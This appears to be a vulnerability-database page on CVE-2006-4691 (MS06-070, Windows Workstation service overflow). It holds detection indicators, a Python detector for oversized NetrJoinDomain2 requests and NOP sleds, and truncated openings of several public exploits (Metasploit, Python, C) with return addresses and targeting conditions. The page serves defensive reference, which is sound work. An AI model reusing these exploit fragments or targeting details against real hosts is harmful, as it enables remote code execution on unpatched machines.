CVE-2006-4691
Published: 2006-11-14
Priority: P267 (critical)
CVSS 2.0: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: available
EPSS: 80.21% (99.6th percentile)
Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname.
Detection & IOCs (extracted from sources)
- Detect oversized NetrJoinDomain2 RPC requests (opnum 0x16) over the \pipe\wkssvc named pipe on SMB port 445; a long hostname/domain parameter indicates exploitation of CVE-2006-4691.
- Look for a NOP sled pattern (repeated \x90\x90) of over 1000 bytes embedded within a NetrJoinDomain2 RPC request payload as a shellcode delivery indicator.
- Monitor for SMB connections to the IPC$ share followed by opening of the \wkssvc named pipe from external/untrusted hosts, which is the attack transport channel.
- Flag use of known exploit return addresses in memory regions associated with ws2help.dll (0x75022ac4), ws2_32.dll (0x71ab21cd), user32.dll (0x77E11627), or ntdll.dll (0x77f81573 / 0x77F92A9B) appearing in RPC stub data.
- Machines already joined to a domain are not exploitable; unenrolled Windows 2000 SP4 and XP SP2 hosts with port 445 exposed are the primary targets.
- Windows XP SP2 exploitation requires Administrator credentials to reach the vulnerable code path, making it harder to exploit remotely without prior credential access.
- Exploitation requires a valid, live Windows domain name to be specified; the exploit will fail without a reachable domain controller responding to LDAP/DNS queries.
- The exploit shellcode and return addresses differ between exploit variants and target OS versions (Win2000 SP4 vs XP SP0/SP1); detection signatures should cover multiple shellcode byte sequences.
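The first two indicators above (oversized opnum 0x16 requests and a long NOP run in the stub) as a small detector over DCERPC request PDUs. This is an added example, not code from the page or from any of the listed exploits; it assumes the caller has already extracted the DCERPC PDU bytes from the SMB write to \pipe\wkssvc, and the 1024-byte stub threshold is an assumption, not a value from the page.

```python
import struct

PTYPE_REQUEST = 0
NETR_JOIN_DOMAIN2_OPNUM = 0x16
STUB_LEN_THRESHOLD = 1024   # assumption: legitimate NetrJoinDomain2 stubs are far smaller
NOP_SLED_THRESHOLD = 1000   # from the indicator above: more than 1000 bytes of \x90

def parse_request(pdu):
    """Return (opnum, stub) for a DCERPC v5 connection-oriented request PDU, else None."""
    if len(pdu) < 24 or pdu[0] != 5 or pdu[2] != PTYPE_REQUEST:
        return None
    end = "<" if (pdu[4] >> 4) & 0xF else ">"   # NDR drep high nibble: 1 = little-endian ints
    frag_len, auth_len = struct.unpack_from(end + "HH", pdu, 8)
    opnum, = struct.unpack_from(end + "H", pdu, 22)   # follows alloc_hint(4) and context id(2)
    if frag_len > len(pdu):
        return None                                   # truncated fragment, cannot judge
    stub_end = frag_len - (auth_len + 8 if auth_len else 0)   # strip auth verifier if present
    return opnum, pdu[24:stub_end]

def longest_nop_run(data):
    """Length of the longest run of consecutive 0x90 bytes."""
    best = run = 0
    for b in data:
        run = run + 1 if b == 0x90 else 0
        best = max(best, run)
    return best

def check_pdu(pdu):
    """Indicator names triggered by one PDU written to the wkssvc pipe."""
    parsed = parse_request(pdu)
    if parsed is None or parsed[0] != NETR_JOIN_DOMAIN2_OPNUM:
        return []
    stub = parsed[1]
    hits = []
    if len(stub) > STUB_LEN_THRESHOLD:
        hits.append("oversized NetrJoinDomain2 stub")
    if longest_nop_run(stub) > NOP_SLED_THRESHOLD:
        hits.append("NOP sled in NetrJoinDomain2 stub")
    return hits

def build_request(opnum, stub):
    """Constructed test PDU: first+last fragment, little-endian NDR, no auth trailer."""
    hdr = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_REQUEST, 0x03, b"\x10\x00\x00\x00",
                      24 + len(stub), 0, 1)
    return hdr + struct.pack("<IHH", len(stub), 0, opnum) + stub

# Constructed samples, not captured traffic: a small join request, and an oversized one
# whose stub carries a long NOP run of the kind the indicators above describe.
BENIGN_JOIN = build_request(NETR_JOIN_DOMAIN2_OPNUM, b"\x00" * 200)
SUSPECT_JOIN = build_request(NETR_JOIN_DOMAIN2_OPNUM, b"\x00" * 64 + b"\x90" * 1100 + b"\x00" * 2500)
```

Feeding `check_pdu` each request PDU seen on the pipe yields an empty list for the small join and both indicator names for the oversized one.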
No detection rules found.
Exploit-DB
Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)
exploitdb · 2010-10-05
---
##
# $Id: ms06_070_wkssvc.rb 10554 2010-10-05 19:29:10Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Workstation Service NetpManageIPCConnect Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect
function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.
In order to exploit this vulnerability, you must specify a the name of a
valid Windows DOMAIN. It m
Exploit-DB
Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070)
exploitdb · 2006-11-18
---
#!/usr/bin/python
# MS06-070 Windows WorkStation NetpManageIPCConnect Vulnerability Exploit
# Tested on windows 2000 server SP4
#
# Usage: python NetAPI-NetrJoinDomain2.py
# Requires a domain controller on the network (configure samba as DC)
# Requires python and impacket
#
# Winny M Thomas ;-)
from impacket.dcerpc import transport
from impacket import uuid
import sys
import socket
import struct
def DCEconnectAndExploit(target, domain):
baselen = 3708
stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
stringbinding %= {'host': target,'pipe': 'wkssvc','port': 445,}
print 'Connecting to named pipe (wkssvc)'
trans = transport.DCERPCTransportFactory(stringbinding)
trans.connect()
print 'Setting up DCE tra
Exploit-DB
Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)
exploitdb · 2006-11-17
---
/***************************************************************************
Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:http://ruder.cdut.net/default.asp
Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct jmp EBX address and fixed exploit output status.
Greetz to InTel
Should work on Windows 2000 Server SP4 (All Languages)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live,more informations see
http://research.eeye.com/html/advisories/published/AD20061114.html,
cocoruder just research the vulnerability and give the exploit for
Win2000.
********************
Exploit-DB
Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)
exploitdb · 2006-11-16
---
/***************************************************************************
Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:http://ruder.cdut.net/default.asp
successfully test on Windows 2000 Server SP4(chinese)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live,more informations see
http://research.eeye.com/html/advisories/published/AD20061114.html,
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/
#include
#include
#include
#include
unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x4
Metasploit
MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
metasploit
This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2. In order to exploit this vulnerability, you must specify the name of a valid Windows DOMAIN. It may be possible to satisfy this condition by using a custom DNS and LDAP setup, however that method is not covered here. Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only requires valid user credentials. Also, testing shows that a machine already joined to a domain is not exploitable.
No writeups or analysis indexed.
References
http://research.eeye.com/html/advisories/published/AD20061114.html
http://secunia.com/advisories/22883
http://securitytracker.com/id?1017221
http://www.kb.cert.org/vuls/id/778036
http://www.securityfocus.com/archive/1/451588/100/0/threaded
http://www.securityfocus.com/bid/20985
http://www.us-cert.gov/cas/techalerts/TA06-318A.html
http://www.vupen.com/english/advisories/2006/4508
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-070
https://exchange.xforce.ibmcloud.com/vulnerabilities/29948
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A607
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A908